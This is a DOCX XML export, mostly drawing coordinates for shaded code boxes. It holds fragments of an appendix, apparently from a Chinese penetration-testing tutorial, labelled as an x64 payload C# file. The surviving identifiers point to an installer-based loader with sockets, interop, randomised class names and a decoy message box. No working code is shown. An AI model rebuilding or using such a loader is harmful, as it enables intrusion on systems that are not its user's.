,1510,14475,1510,14468,1510,14460,1510,14452,1510,14444,1510,14436,1510,14428,1510,14419,1510,14410,1510,14401,1510,14392,1510,14383,1510,14373,1510,14363,1510,14353,1510,14343,1510,14333,1510,14322,1510,14311,1510,14300,1510,14288,1510,14277,1510,14265,1510,14253,1510,14241,1510,14228,1510,14215,1510,14202,1510,14189,1510,14175,1510,14162,1510,14148,1510,14133,1510,14119,1510,14104,1510,14089,1510,14074,1510,14058,1510,14042,1510,14026e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:700.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14010" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:14010;width:30;height:650" coordorigin="1490,14010" coordsize="30,650" path="m1517,14026l1517,14026,1517,14026,1517,14026,1517,14026,1517,14026,1517,14026,1517,14026,1517,14026,1517,14026,1517,14026,1517,14026,1517,14027,1517,14027,1517,14027,1517,14027,1517,14027,1517,14028,1517,14028,1517,14028,1517,14029,1517,14029,1517,14030,1517,14030,1517,14031,1517,14031,1517,14032,1517,14033,1517,14034,1517,14034,1517,14035,1517,14036,1517,14037,1517,14039,1517,14040,1517,14041,1517,14042,1517,14044,1517,14045,1517,14047,1517,14049,1517,14051,1517,14052,1517,14054,1517,14057,1517,14059,1517,14061,1517,14063,1517,14066,1517,14068,1517,14071,1517,14074,1517,14077,1517,14080,1517,14083,1517,14086,1517,14090,1517,14093,1517,14097,1517,14101,1517,14105,1517,14109,1517,14113,1517,14117,1517,14122,1517,14126,1517,14131,1517,14136,1517,14141,1517,14146,1517,14152,1517,14157,1517,14163,1517,14169,1517,14175,1517,14181,1517,14188,1517,14194,1517,14201,1517,14208,1517,14215,1517,14222,1517,14230,1517,14237,1517,14245,1517,14253,1517,14261,1517,14270,1517,14278,1517,14287,1517,14296,1517,14305,1517,14315,1517,14324,1517,14334,1517,14344,1517,14354,1517,14365,1517,14376,1517,14386,1517,14398,1517,14409,1517,14421,1517,14432,1517,14445,1517,14457,1517,14469,1517,14482,1517,14495,1517,14508,1517,14522,1517,14536,1517,14550,1517,14564,1517,14579,1517,14593,1517,14608,1517,14624,1517,14639,1517,14655,1517,14671e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:732.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14650" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:14650;width:8990;height:370" coordorigin="1490,14650" coordsize="8990,370" path="m1510,14671l1510,14671,1510,14671,1510,14671,1510,14671,1510,14671,1510,14671,1511,14671,1512,14671,1512,14671,1514,14671,1515,14671,1517,14671,1519,14671,1521,14671,1524,14671,1528,14671,1532,14671,1536,14671,1541,14671,1546,14671,1552,14671,1559,14671,1566,14671,1575,14671,1583,14671,1593,14671,1603,14671,1615,14671,1627,14671,1640,14671,1654,14671,1668,14671,1684,14671,1701,14671,1719,14671,1738,14671,1758,14671,1780,14671,1802,14671,1826,14671,1851,14671,1877,14671,1904,14671,1933,14671,1963,14671,1995,14671,2028,14671,2063,14671,2099,14671,2136,14671,2175,14671,2216,14671,2259,14671,2303,14671,2348,14671,2396,14671,2445,14671,2496,14671,2549,14671,2604,14671,2660,14671,2719,14671,2779,14671,2841,14671,2906,14671,2972,14671,3041,14671,3112,14671,3184,14671,3259,14671,3336,14671,3416,14671,3498,14671,3582,14671,3668,14671,3757,14671,3848,14671,3941,14671,4037,14671,4136,14671,4236,14671,4340,14671,4446,14671,4555,14671,4666,14671,4780,14671,4897,14671,5017,14671,5139,14671,5264,14671,5392,14671,5523,14671,5657,14671,5793,14671,5933,14671,6076,14671,6222,14671,6370,14671,6522,14671,6677,14671,6835,14671,6997,14671,7161,14671,7329,14671,7500,14671,7675,14671,7853,14671,8034,14671,8219,14671,8407,14671,8598,14671,8793,14671,8992,14671,9194,14671,9400,14671,9609,14671,9823,14671,10039,14671,10260,14671,10484,14671,10484,14671,10484,14671,10484,14671,10484,14671,10484,14671,10484,14671,10484,14671,10484,14671,10484,14672,10484,14672,10484,14672,10484,14672,10484,14672,10484,14672,10484,14672,10484,14672,10484,14672,10484,14672,10484,14673,10484,14673,10484,14673,10484,14673,10484,14674,10484,14674,10484,14674,10484,14675,10484,14675,10484,14676,10484,14676,10484,14677,10484,14677,10484,14678,10484,14678,10484,14679,10484,14680,10484,14681,10484,14681,10484,14682,10484,14683,10484,14684,10484,14685,10484,14686,10484,14687,10484,14688,10484,14690,10484,14691,10484,14692,10484,14694,10484,14695,10484,14697,10484,14698,10484,14700,10484,14701,10484,14703,10484,14705,10484,14707,10484,14709,10484,14711,10484,14713,10484,14715,10484,14718,10484,14720,10484,14722,10484,14725,10484,14727,10484,14730,10484,14733,10484,14736,10484,14739,10484,14742,10484,14745,10484,14748,10484,14751,10484,14755,10484,14758,10484,14762,10484,14765,10484,14769,10484,14773,10484,14777,10484,14781,10484,14785,10484,14789,10484,14794,10484,14798,10484,14803,10484,14807,10484,14812,10484,14817,10484,14822,10484,14827,10484,14832,10484,14838,10484,14843,10484,14849,10484,14855,10484,14860,10484,14866,10484,14873,10484,14879,10484,14885,10484,14892,10484,14898,10484,14905,10484,14912,10484,14919,10484,14926,10484,14933,10484,14941,10484,14948,10484,14956,10484,14964,10484,14972,10484,14980,10484,14988,10484,14996,10484,15005,10484,15014,10484,15023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2,1510,15032,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15030,1510,15030,1510,15030,1510,15030,1510,15029,1510,15029,1510,15029,1510,15028,1510,15028,1510,15027,1510,15027,1510,15026,1510,15026,1510,15025,1510,15025,1510,15024,1510,15023,1510,15022,1510,15022,1510,15021,1510,15020,1510,15019,1510,15018,1510,15017,1510,15016,1510,15015,1510,15013,1510,15012,1510,15011,1510,15009,1510,15008,1510,15006,1510,15005,1510,15003,1510,15002,1510,15000,1510,14998,1510,14996,1510,14994,1510,14992,1510,14990,1510,14988,1510,14985,1510,14983,1510,14981,1510,14978,1510,14976,1510,14973,1510,14970,1510,14967,1510,14964,1510,14961,1510,14958,1510,14955,1510,14952,1510,14948,1510,14945,1510,14941,1510,14938,1510,14934,1510,14930,1510,14926,1510,14922,1510,14918,1510,14914,1510,14909,1510,14905,1510,14900,1510,14896,1510,14891,1510,14886,1510,14881,1510,14876,1510,14871,1510,14865,1510,14860,1510,14854,1510,14848,1510,14842,1510,14837,1510,14830,1510,14824,1510,14818,1510,14811,1510,14805,1510,14798,1510,14791,1510,14784,1510,14777,1510,14770,1510,14762,1510,14755,1510,14747,1510,14739,1510,14731,1510,14723,1510,14715,1510,14707,1510,14698,1510,14689,1510,14680,1510,14671e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:732.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14650" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:14650;width:30;height:370" coordorigin="1490,14650" coordsize="30,370" path="m1517,14671l1517,14671,1517,14671,1517,14671,1517,14671,1517,14671,1517,14671,1517,14671,1517,14671,1517,14672,1517,14672,1517,14672,1517,14672,1517,14672,1517,14672,1517,14672,1517,14672,1517,14672,1517,14672,1517,14673,1517,14673,1517,14673,1517,14673,1517,14674,1517,14674,1517,14674,1517,14675,1517,14675,1517,14676,1517,14676,1517,14677,1517,14677,1517,14678,1517,14678,1517,14679,1517,14680,1517,14681,1517,14681,1517,14682,1517,14683,1517,14684,1517,14685,1517,14686,1517,14687,1517,14688,1517,14690,1517,14691,1517,14692,1517,14694,1517,14695,1517,14697,1517,14698,1517,14700,1517,14701,1517,14703,1517,14705,1517,14707,1517,14709,1517,14711,1517,14713,1517,14715,1517,14718,1517,14720,1517,14722,1517,14725,1517,14727,1517,14730,1517,14733,1517,14736,1517,14739,1517,14742,1517,14745,1517,14748,1517,14751,1517,14755,1517,14758,1517,14762,1517,14765,1517,14769,1517,14773,1517,14777,1517,14781,1517,14785,1517,14789,1517,14794,1517,14798,1517,14803,1517,14807,1517,14812,1517,14817,1517,14822,1517,14827,1517,14832,1517,14838,1517,14843,1517,14849,1517,14855,1517,14860,1517,14866,1517,14873,1517,14879,1517,14885,1517,14892,1517,14898,1517,14905,1517,14912,1517,14919,1517,14926,1517,14933,1517,14941,1517,14948,1517,14956,1517,14964,1517,14972,1517,14980,1517,14988,1517,14996,1517,15005,1517,15014,1517,15023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19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15010" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:15010;width:8990;height:390" coordorigin="1490,15010" coordsize="8990,39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2,10484,15032,10484,15032,10484,15033,10484,15033,10484,15033,10484,15033,10484,15034,10484,15034,10484,15034,10484,15035,10484,15035,10484,15035,10484,15036,10484,15036,10484,15037,10484,15038,10484,15038,10484,15039,10484,15040,10484,15040,10484,15041,10484,15042,10484,15043,10484,15044,10484,15045,10484,15046,10484,15047,10484,15048,10484,15049,10484,15051,10484,15052,10484,15053,10484,15055,10484,15056,10484,15058,10484,15059,10484,15061,10484,15063,10484,15065,10484,15067,10484,15069,10484,15071,10484,15073,10484,15075,10484,15077,10484,15080,10484,15082,10484,15085,10484,15087,10484,15090,10484,15093,10484,15096,10484,15099,10484,15102,10484,15105,10484,15108,10484,15111,10484,15115,10484,15118,10484,15122,10484,15126,10484,15129,10484,15133,10484,15137,10484,15141,10484,15146,10484,15150,10484,15154,10484,15159,10484,15164,10484,15168,10484,15173,10484,15178,10484,15183,10484,15189,10484,15194,10484,15199,10484,15205,10484,15211,10484,15216,10484,15222,10484,15229,10484,15235,10484,15241,10484,15248,10484,15254,10484,15261,10484,15268,10484,15275,10484,15282,10484,15289,10484,15297,10484,15304,10484,15312,10484,15320,10484,15328,10484,15336,10484,15344,10484,15353,10484,15361,10484,15370,10484,15379,10484,15388,10484,15397,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10483,15407,10482,15407,10482,15407,10480,15407,10479,15407,10477,15407,10475,15407,10473,15407,10470,15407,10466,15407,10462,15407,10458,15407,10453,15407,10448,15407,10442,15407,10435,15407,10428,15407,10419,15407,10411,15407,10401,15407,10391,15407,10379,15407,10367,15407,10354,15407,10340,15407,10326,15407,10310,15407,10293,15407,10275,15407,10256,15407,10236,15407,10215,15407,10192,15407,10168,15407,10143,15407,10117,15407,10090,15407,10061,15407,10031,15407,9999,15407,9966,15407,9931,15407,9895,15407,9858,15407,9819,15407,9778,15407,9735,15407,9691,15407,9646,15407,9598,15407,9549,15407,9498,15407,9445,15407,9391,15407,9334,15407,9275,15407,9215,15407,9153,15407,9088,15407,9022,15407,8953,15407,8883,15407,8810,15407,8735,15407,8658,15407,8578,15407,8497,15407,8413,15407,8326,15407,8238,15407,8146,15407,8053,15407,7957,15407,7859,15407,7758,15407,7654,15407,7548,15407,7439,15407,7328,15407,7214,15407,7097,15407,6977,15407,6855,15407,6730,15407,6602,15407,6471,15407,6337,15407,6201,15407,6061,15407,5918,15407,5773,15407,5624,15407,5472,15407,5317,15407,5159,15407,4997,15407,4833,15407,4665,15407,4494,15407,4319,15407,4141,15407,3960,15407,3776,15407,3587,15407,3396,15407,3201,15407,3002,15407,2800,15407,2594,15407,2385,15407,2172,15407,1955,15407,1734,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15406,1510,15406,1510,15406,1510,15406,1510,15406,1510,15406,1510,15406,1510,15405,1510,15405,1510,15405,1510,15405,1510,15404,1510,15404,1510,15404,1510,15403,1510,15403,1510,15402,1510,15402,1510,15401,1510,15401,1510,15400,1510,15399,1510,15399,1510,15398,1510,15397,1510,15396,1510,15395,1510,15395,1510,15394,1510,15393,1510,15391,1510,15390,1510,15389,1510,15388,1510,15386,1510,15385,1510,15384,1510,15382,1510,15381,1510,15379,1510,15377,1510,15375,1510,15374,1510,15372,1510,15370,1510,15368,1510,15366,1510,15363,1510,15361,1510,15359,1510,15356,1510,15354,1510,15351,1510,15348,1510,15346,1510,15343,1510,15340,1510,15337,1510,15334,1510,15330,1510,15327,1510,15324,1510,15320,1510,15317,1510,15313,1510,15309,1510,15305,1510,15301,1510,15297,1510,15293,1510,15288,1510,15284,1510,15279,1510,15275,1510,15270,1510,15265,1510,15260,1510,15255,1510,15250,1510,15244,1510,15239,1510,15233,1510,15228,1510,15222,1510,15216,1510,15210,1510,15204,1510,15197,1510,15191,1510,15184,1510,15177,1510,15170,1510,15163,1510,15156,1510,15149,1510,15142,1510,15134,1510,15126,1510,15118,1510,15110,1510,15102,1510,15094,1510,15086,1510,15077,1510,15068,1510,15059,1510,15050,1510,15041,1510,15032e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:750.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15010" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:15010;width:30;height:390" coordorigin="1490,15010" coordsize="30,390" path="m1517,15032l1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15033,1517,15033,1517,15033,1517,15033,1517,15034,1517,15034,1517,15034,1517,15035,1517,15035,1517,15035,1517,15036,1517,15036,1517,15037,1517,15038,1517,15038,1517,15039,1517,15040,1517,15040,1517,15041,1517,15042,1517,15043,1517,15044,1517,15045,1517,15046,1517,15047,1517,15048,1517,15049,1517,15051,1517,15052,1517,15053,1517,15055,1517,15056,1517,15058,1517,15059,1517,15061,1517,15063,1517,15065,1517,15067,1517,15069,1517,15071,1517,15073,1517,15075,1517,15077,1517,15080,1517,15082,1517,15085,1517,15087,1517,15090,1517,15093,1517,15096,1517,15099,1517,15102,1517,15105,1517,15108,1517,15111,1517,15115,1517,15118,1517,15122,1517,15126,1517,15129,1517,15133,1517,15137,1517,15141,1517,15146,1517,15150,1517,15154,1517,15159,1517,15164,1517,15168,1517,15173,1517,15178,1517,15183,1517,15189,1517,15194,1517,15199,1517,15205,1517,15211,1517,15216,1517,15222,1517,15229,1517,15235,1517,15241,1517,15248,1517,15254,1517,15261,1517,15268,1517,15275,1517,15282,1517,15289,1517,15297,1517,15304,1517,15312,1517,15320,1517,15328,1517,15336,1517,15344,1517,15353,1517,15361,1517,15370,1517,15379,1517,15388,1517,15397,1517,15407e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:769.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15390" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15390;width:8990;height:370" coordorigin="1490,15390" coordsize="8990,370" path="m1510,15407l1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1510,15407,1511,15407,1512,15407,1512,15407,1514,15407,1515,15407,1517,15407,1519,15407,1521,15407,1524,15407,1528,15407,1532,15407,1536,15407,1541,15407,1546,15407,1552,15407,1559,15407,1566,15407,1575,15407,1583,15407,1593,15407,1603,15407,1615,15407,1627,15407,1640,15407,1654,15407,1668,15407,1684,15407,1701,15407,1719,15407,1738,15407,1758,15407,1780,15407,1802,15407,1826,15407,1851,15407,1877,15407,1904,15407,1933,15407,1963,15407,1995,15407,2028,15407,2063,15407,2099,15407,2136,15407,2175,15407,2216,15407,2259,15407,2303,15407,2348,15407,2396,15407,2445,15407,2496,15407,2549,15407,2604,15407,2660,15407,2719,15407,2779,15407,2841,15407,2906,15407,2972,15407,3041,15407,3112,15407,3184,15407,3259,15407,3336,15407,3416,15407,3498,15407,3582,15407,3668,15407,3757,15407,3848,15407,3941,15407,4037,15407,4136,15407,4236,15407,4340,15407,4446,15407,4555,15407,4666,15407,4780,15407,4897,15407,5017,15407,5139,15407,5264,15407,5392,15407,5523,15407,5657,15407,5793,15407,5933,15407,6076,15407,6222,15407,6370,15407,6522,15407,6677,15407,6835,15407,6997,15407,7161,15407,7329,15407,7500,15407,7675,15407,7853,15407,8034,15407,8219,15407,8407,15407,8598,15407,8793,15407,8992,15407,9194,15407,9400,15407,9609,15407,9823,15407,10039,15407,10260,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15407,10484,15408,10484,15408,10484,15408,10484,15408,10484,15408,10484,15409,10484,15409,10484,15409,10484,15410,10484,15410,10484,15411,10484,15411,10484,15411,10484,15412,10484,15413,10484,15413,10484,15414,10484,15414,10484,15415,10484,15416,10484,15417,10484,15418,10484,15418,10484,15419,10484,15420,10484,15421,10484,15423,10484,15424,10484,15425,10484,15426,10484,15428,10484,15429,10484,15430,10484,15432,10484,15433,10484,15435,10484,15437,10484,15439,10484,15440,10484,15442,10484,15444,10484,15446,10484,15448,10484,15451,10484,15453,10484,15455,10484,15458,10484,15460,10484,15463,10484,15465,10484,15468,10484,15471,10484,15474,10484,15477,10484,15480,10484,15483,10484,15487,10484,15490,10484,15493,10484,15497,10484,15501,10484,15504,10484,15508,10484,15512,10484,15516,10484,15520,10484,15525,10484,15529,10484,15533,10484,15538,10484,15543,10484,15548,10484,15552,10484,15557,10484,15563,10484,15568,10484,15573,10484,15579,10484,15584,10484,15590,10484,15596,10484,15602,10484,15608,10484,15614,10484,15621,10484,15627,10484,15634,10484,15640,10484,15647,10484,15654,10484,15661,10484,15669,10484,15676,10484,15684,10484,15691,10484,15699,10484,15707,10484,15715,10484,15723,10484,15732,10484,15740,10484,15749,10484,15758,10484,15767,10484,15767,10484,15767,10484,15767,10484,15767,10484,15767,10484,15767,10483,15767,10482,15767,10482,15767,10480,15767,10479,15767,10477,15767,10475,15767,10473,15767,10470,15767,10466,15767,10462,15767,10458,15767,10453,15767,10448,15767,10442,15767,10435,15767,10428,15767,10419,15767,10411,15767,10401,15767,10391,15767,10379,15767,10367,15767,10354,15767,10340,15767,10326,15767,10310,15767,10293,15767,10275,15767,10256,15767,10236,15767,10215,15767,10192,15767,10168,15767,10143,15767,10117,15767,10090,15767,10061,15767,10031,15767,9999,15767,9966,15767,9931,15767,9895,15767,9858,15767,9819,15767,9778,15767,9735,15767,9691,15767,9646,15767,9598,15767,9549,15767,9498,15767,9445,15767,9391,15767,9334,15767,9275,15767,9215,15767,9153,15767,9088,15767,9022,15767,8953,15767,8883,15767,8810,15767,8735,15767,8658,15767,8578,15767,8497,15767,8413,15767,8326,15767,8238,15767,8146,15767,8053,15767,7957,15767,7859,15767,7758,15767,7654,15767,7548,15767,7439,15767,7328,15767,7214,15767,7097,15767,6977,15767,6855,15767,6730,15767,6602,15767,6471,15767,6337,15767,6201,15767,6061,15767,5918,15767,5773,15767,5624,15767,5472,15767,5317,15767,5159,15767,4997,15767,4833,15767,4665,15767,4494,15767,4319,15767,4141,15767,3960,15767,3776,15767,3587,15767,3396,15767,3201,15767,3002,15767,2800,15767,2594,15767,2385,15767,2172,15767,1955,15767,1734,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15767,1510,15766,1510,15766,1510,15766,1510,15766,1510,15766,1510,15766,1510,15765,1510,15765,1510,15765,1510,15765,1510,15764,1510,15764,1510,15764,1510,15763,1510,15763,1510,15762,1510,15762,1510,15761,1510,15761,1510,15760,1510,15759,1510,15759,1510,15758,1510,15757,1510,15756,1510,15755,1510,15754,1510,15753,1510,15752,1510,15751,1510,15750,1510,15749,1510,15747,1510,15746,1510,15745,1510,15743,1510,15742,1510,15740,1510,15739,1510,15737,1510,15735,1510,15733,1510,15731,1510,15729,1510,15727,1510,15725,1510,15723,1510,15721,1510,15718,1510,15716,1510,15714,1510,15711,1510,15708,1510,15705,1510,15703,1510,15700,1510,15697,1510,15694,1510,15690,1510,15687,1510,15684,1510,15680,1510,15677,1510,15673,1510,15669,1510,15666,1510,15662,1510,15658,1510,15653,1510,15649,1510,15645,1510,15640,1510,15636,1510,15631,1510,15626,1510,15621,1510,15616,1510,15611,1510,15606,1510,15601,1510,15595,1510,15589,1510,15584,1510,15578,1510,15572,1510,15566,1510,15560,1510,15553,1510,15547,1510,15540,1510,15533,1510,15527,1510,15520,1510,15512,1510,15505,1510,15498,1510,15490,1510,15482,1510,15475,1510,15467,1510,15459,1510,15450,1510,15442,1510,15433,1510,15425,1510,15416,1510,15407e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:769.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15390" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15390;width:30;height:370" coordorigin="1490,15390" coordsize="30,370" path="m1517,15407l1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15408,1517,15408,1517,15408,1517,15408,1517,15408,1517,15409,1517,15409,1517,15409,1517,15410,1517,15410,1517,15411,1517,15411,1517,15411,1517,15412,1517,15413,1517,15413,1517,15414,1517,15414,1517,15415,1517,15416,1517,15417,1517,15418,1517,15418,1517,15419,1517,15420,1517,15421,1517,15423,1517,15424,1517,15425,1517,15426,1517,15428,1517,15429,1517,15430,1517,15432,1517,15433,1517,15435,1517,15437,1517,15439,1517,15440,1517,15442,1517,15444,1517,15446,1517,15448,1517,15451,1517,15453,1517,15455,1517,15458,1517,15460,1517,15463,1517,15465,1517,15468,1517,15471,1517,15474,1517,15477,1517,15480,1517,15483,1517,15487,1517,15490,1517,15493,1517,15497,1517,15501,1517,15504,1517,15508,1517,15512,1517,15516,1517,15520,1517,15525,1517,15529,1517,15533,1517,15538,1517,15543,1517,15548,1517,15552,1517,15557,1517,15563,1517,15568,1517,15573,1517,15579,1517,15584,1517,15590,1517,15596,1517,15602,1517,15608,1517,15614,1517,15621,1517,15627,1517,15634,1517,15640,1517,15647,1517,15654,1517,15661,1517,15669,1517,15676,1517,15684,1517,15691,1517,15699,1517,15707,1517,15715,1517,15723,1517,15732,1517,15740,1517,15749,1517,15758,1517,15767e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:301.8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8459" w:firstLine="0"/>
      </w:pP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附录：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Micropoor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.cs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-39"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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payload</w:t>
      </w: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Linq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ckets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Runtime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InteropServices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Threading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Configuration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Install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Windows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Forms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GQLBigHgUniLuVx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Main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while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{{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MessageBox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"doge"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Console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ReadLine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}}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59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ComponentModel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RunInstaller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esxWUYUTWShqW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1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Configuration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Install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Installer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override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Uninstall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Collections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IDictionary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zWrdFAU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Hmunnu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jkmhGrfzsKQeCG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LCIUtRN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7.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:350" coordorigin="1490,1350" coordsize="8990,3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5,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1379,10484,1379,10484,1379,10484,1380,10484,1381,10484,1381,10484,1382,10484,1382,10484,1383,10484,1384,10484,1385,10484,1385,10484,1386,10484,1387,10484,1388,10484,1389,10484,1390,10484,1391,10484,1393,10484,1394,10484,1395,10484,1396,10484,1398,10484,1399,10484,1401,10484,1402,10484,1404,10484,1406,10484,1407,10484,1409,10484,1411,10484,1413,10484,1415,10484,1417,10484,1419,10484,1421,10484,1424,10484,1426,10484,1428,10484,1431,10484,1434,10484,1436,10484,1439,10484,1442,10484,1445,10484,1448,10484,1451,10484,1454,10484,1457,10484,1461,10484,1464,10484,1468,10484,1471,10484,1475,10484,1479,10484,1483,10484,1487,10484,1491,10484,1495,10484,1499,10484,1504,10484,1508,10484,1513,10484,1518,10484,1522,10484,1527,10484,1532,10484,1537,10484,1543,10484,1548,10484,1554,10484,1559,10484,1565,10484,1571,10484,1577,10484,1583,10484,1589,10484,1595,10484,1602,10484,1608,10484,1615,10484,1622,10484,1628,10484,1635,10484,1643,10484,1650,10484,1657,10484,1665,10484,1673,10484,1681,10484,1688,10484,1697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5,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1703,1510,1703,1510,1703,1510,1702,1510,1702,1510,1702,1510,1701,1510,1701,1510,1701,1510,1700,1510,1700,1510,1699,1510,1698,1510,1698,1510,1697,1510,1696,1510,1696,1510,1695,1510,1694,1510,1693,1510,1692,1510,1691,1510,1690,1510,1689,1510,1688,1510,1687,1510,1686,1510,1685,1510,1683,1510,1682,1510,1680,1510,1679,1510,1677,1510,1676,1510,1674,1510,1672,1510,1670,1510,1669,1510,1667,1510,1665,1510,1663,1510,1660,1510,1658,1510,1656,1510,1653,1510,1651,1510,1649,1510,1646,1510,1643,1510,1640,1510,1638,1510,1635,1510,1632,1510,1629,1510,1625,1510,1622,1510,1619,1510,1615,1510,1612,1510,1608,1510,1605,1510,1601,1510,1597,1510,1593,1510,1589,1510,1585,1510,1580,1510,1576,1510,1571,1510,1567,1510,1562,1510,1557,1510,1552,1510,1547,1510,1542,1510,1537,1510,1532,1510,1526,1510,1520,1510,1515,1510,1509,1510,1503,1510,1497,1510,1491,1510,1484,1510,1478,1510,1472,1510,1465,1510,1458,1510,1451,1510,1444,1510,1437,1510,1430,1510,1422,1510,1415,1510,1407,1510,1399,1510,1391,1510,1383,1510,1375e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:1370;width:30;height:330" coordorigin="1490,1370" coordsize="30,330" path="m1517,1375l1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1376,1517,1376,1517,1376,1517,1376,1517,1377,1517,1377,1517,1377,1517,1377,1517,1378,1517,1378,1517,1379,1517,1379,1517,1379,1517,1380,1517,1381,1517,1381,1517,1382,1517,1382,1517,1383,1517,1384,1517,1385,1517,1385,1517,1386,1517,1387,1517,1388,1517,1389,1517,1390,1517,1391,1517,1393,1517,1394,1517,1395,1517,1396,1517,1398,1517,1399,1517,1401,1517,1402,1517,1404,1517,1406,1517,1407,1517,1409,1517,1411,1517,1413,1517,1415,1517,1417,1517,1419,1517,1421,1517,1424,1517,1426,1517,1428,1517,1431,1517,1434,1517,1436,1517,1439,1517,1442,1517,1445,1517,1448,1517,1451,1517,1454,1517,1457,1517,1461,1517,1464,1517,1468,1517,1471,1517,1475,1517,1479,1517,1483,1517,1487,1517,1491,1517,1495,1517,1499,1517,1504,1517,1508,1517,1513,1517,1518,1517,1522,1517,1527,1517,1532,1517,1537,1517,1543,1517,1548,1517,1554,1517,1559,1517,1565,1517,1571,1517,1577,1517,1583,1517,1589,1517,1595,1517,1602,1517,1608,1517,1615,1517,1622,1517,1628,1517,1635,1517,1643,1517,1650,1517,1657,1517,1665,1517,1673,1517,1681,1517,1688,1517,1697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7,10484,1811,10484,1815,10484,1819,10484,1823,10484,1828,10484,1832,10484,1837,10484,1842,10484,1846,10484,1851,10484,1857,10484,1862,10484,1867,10484,1873,10484,1878,10484,1884,10484,1890,10484,1896,10484,1902,10484,1908,10484,1914,10484,1921,10484,1928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1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7,1517,1811,1517,1815,1517,1819,1517,1823,1517,1828,1517,1832,1517,1837,1517,1842,1517,1846,1517,